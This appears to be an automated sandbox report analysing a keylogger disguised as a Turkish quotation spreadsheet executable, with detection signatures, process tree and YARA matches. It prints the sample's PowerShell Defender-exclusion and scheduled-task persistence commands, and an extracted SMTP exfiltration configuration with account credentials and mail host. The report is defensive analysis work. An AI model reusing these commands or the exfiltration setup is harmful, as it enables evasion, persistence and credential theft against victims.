Edit tour

Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Overview

General Information

Sample name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe renamed because original name is a hash value
Original sample name:	TEKLF TALEP VE FYAT TEKLF RFQ_xlsx.exe
Analysis ID:	1533038
MD5:	83609dc3087ad861899a060172ba6882
SHA1:	3b28330cc112cab13a682d846a5bc9e142688c5e
SHA256:	3dcbee6ee102a689e41b9198c27fceed7962f5ce3861721032898e5771087d50
Tags:	exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

MassLogger RAT, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe" MD5: 83609DC3087AD861899A060172BA6882)

powershell.exe (PID: 2548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6736 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6216 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe (PID: 5956 cmdline: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe" MD5: 83609DC3087AD861899A060172BA6882)

TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe (PID: 5724 cmdline: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe" MD5: 83609DC3087AD861899A060172BA6882)

qovDEn.exe (PID: 4068 cmdline: C:\Users\user\AppData\Roaming\qovDEn.exe MD5: 83609DC3087AD861899A060172BA6882)

schtasks.exe (PID: 4820 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

qovDEn.exe (PID: 2816 cmdline: "C:\Users\user\AppData\Roaming\qovDEn.exe" MD5: 83609DC3087AD861899A060172BA6882)

conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.2758770244.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000A.00000002.2762742331.0000000003169000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.2758777957.000000000043D000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.2761770176.00000000034AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e6a8:$a1: get_encryptedPassword 0x716c8:$a1: get_encryptedPassword 0xb44e8:$a1: get_encryptedPassword 0x2ec30:$a2: get_encryptedUsername 0x71c50:$a2: get_encryptedUsername 0xb4a70:$a2: get_encryptedUsername 0x2e31b:$a3: get_timePasswordChanged 0x7133b:$a3: get_timePasswordChanged 0xb415b:$a3: get_timePasswordChanged 0x2e432:$a4: get_passwordField 0x71452:$a4: get_passwordField 0xb4272:$a4: get_passwordField 0x2e6be:$a5: set_encryptedPassword 0x716de:$a5: set_encryptedPassword 0xb44fe:$a5: set_encryptedPassword 0x313da:$a6: get_passwords 0x743fa:$a6: get_passwords 0xb721a:$a6: get_passwords 0x3176e:$a7: get_logins 0x7478e:$a7: get_logins 0xb75ae:$a7: get_logins
00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e838:$a1: get_encryptedPassword 0x71858:$a1: get_encryptedPassword 0xb4678:$a1: get_encryptedPassword 0x2edc0:$a2: get_encryptedUsername 0x71de0:$a2: get_encryptedUsername 0xb4c00:$a2: get_encryptedUsername 0x2e4ab:$a3: get_timePasswordChanged 0x714cb:$a3: get_timePasswordChanged 0xb42eb:$a3: get_timePasswordChanged 0x2e5c2:$a4: get_passwordField 0x715e2:$a4: get_passwordField 0xb4402:$a4: get_passwordField 0x2e84e:$a5: set_encryptedPassword 0x7186e:$a5: set_encryptedPassword 0xb468e:$a5: set_encryptedPassword 0x3156a:$a6: get_passwords 0x7458a:$a6: get_passwords 0xb73aa:$a6: get_passwords 0x318fe:$a7: get_logins 0x7491e:$a7: get_logins 0xb773e:$a7: get_logins
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2deeb:$a1: get_encryptedPassword 0x2e469:$a2: get_encryptedUsername 0x2db6d:$a3: get_timePasswordChanged 0x2dc84:$a4: get_passwordField 0x2df01:$a5: set_encryptedPassword 0x30bc5:$a6: get_passwords 0x30f55:$a7: get_logins 0x30bb1:$a8: GetOutlookPasswords 0x3056a:$a9: StartKeylogger 0x30eae:$a10: KeyLoggerEventArgs 0x3060a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 5724	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 5724	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: qovDEn.exe PID: 4068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: qovDEn.exe PID: 4068	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: qovDEn.exe PID: 4068	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: qovDEn.exe PID: 4068	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: qovDEn.exe PID: 4068	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7492:$a1: get_encryptedPassword 0x7a10:$a2: get_encryptedUsername 0x7114:$a3: get_timePasswordChanged 0x722b:$a4: get_passwordField 0x74a8:$a5: set_encryptedPassword 0xa16c:$a6: get_passwords 0xa4fc:$a7: get_logins 0xa158:$a8: GetOutlookPasswords 0x9b11:$a9: StartKeylogger 0xa455:$a10: KeyLoggerEventArgs 0x9bb1:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: qovDEn.exe PID: 2816	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: qovDEn.exe PID: 2816	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: qovDEn.exe PID: 2816	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.2.qovDEn.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.qovDEn.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b51:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dae:$a4: \Orbitum\User Data\Default\Login Data 0x3978d:$a5: \Kometa\User Data\Default\Login Data
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.qovDEn.exe.4009a28.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.qovDEn.exe.4009a28.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.qovDEn.exe.4009a28.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.qovDEn.exe.4009a28.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
11.2.qovDEn.exe.4009a28.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b51:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dae:$a4: \Orbitum\User Data\Default\Login Data 0x3978d:$a5: \Kometa\User Data\Default\Login Data
11.2.qovDEn.exe.4009a28.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b51:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dae:$a4: \Orbitum\User Data\Default\Login Data 0x3978d:$a5: \Kometa\User Data\Default\Login Data
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.qovDEn.exe.3fc6a08.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.qovDEn.exe.3fc6a08.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.qovDEn.exe.3fc6a08.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.qovDEn.exe.3fc6a08.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
11.2.qovDEn.exe.3fc6a08.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b51:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dae:$a4: \Orbitum\User Data\Default\Login Data 0x3978d:$a5: \Kometa\User Data\Default\Login Data
11.2.qovDEn.exe.3fc6a08.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.qovDEn.exe.4009a28.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.qovDEn.exe.4009a28.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.qovDEn.exe.4009a28.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.qovDEn.exe.4009a28.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.qovDEn.exe.4009a28.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
11.2.qovDEn.exe.4009a28.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a951:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abae:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ce:$a4: \Orbitum\User Data\Default\Login Data 0x3b58d:$a5: \Kometa\User Data\Default\Login Data 0x7e3ad:$a5: \Kometa\User Data\Default\Login Data
11.2.qovDEn.exe.4009a28.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
11.2.qovDEn.exe.3fc6a08.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.qovDEn.exe.3fc6a08.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.qovDEn.exe.3fc6a08.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.qovDEn.exe.3fc6a08.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.qovDEn.exe.3fc6a08.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
11.2.qovDEn.exe.3fc6a08.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10ee:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a951:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d971:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0791:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abae:$a4: \Orbitum\User Data\Default\Login Data 0x7dbce:$a4: \Orbitum\User Data\Default\Login Data 0xc09ee:$a4: \Orbitum\User Data\Default\Login Data 0x3b58d:$a5: \Kometa\User Data\Default\Login Data 0x7e5ad:$a5: \Kometa\User Data\Default\Login Data 0xc13cd:$a5: \Kometa\User Data\Default\Login Data
11.2.qovDEn.exe.3fc6a08.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
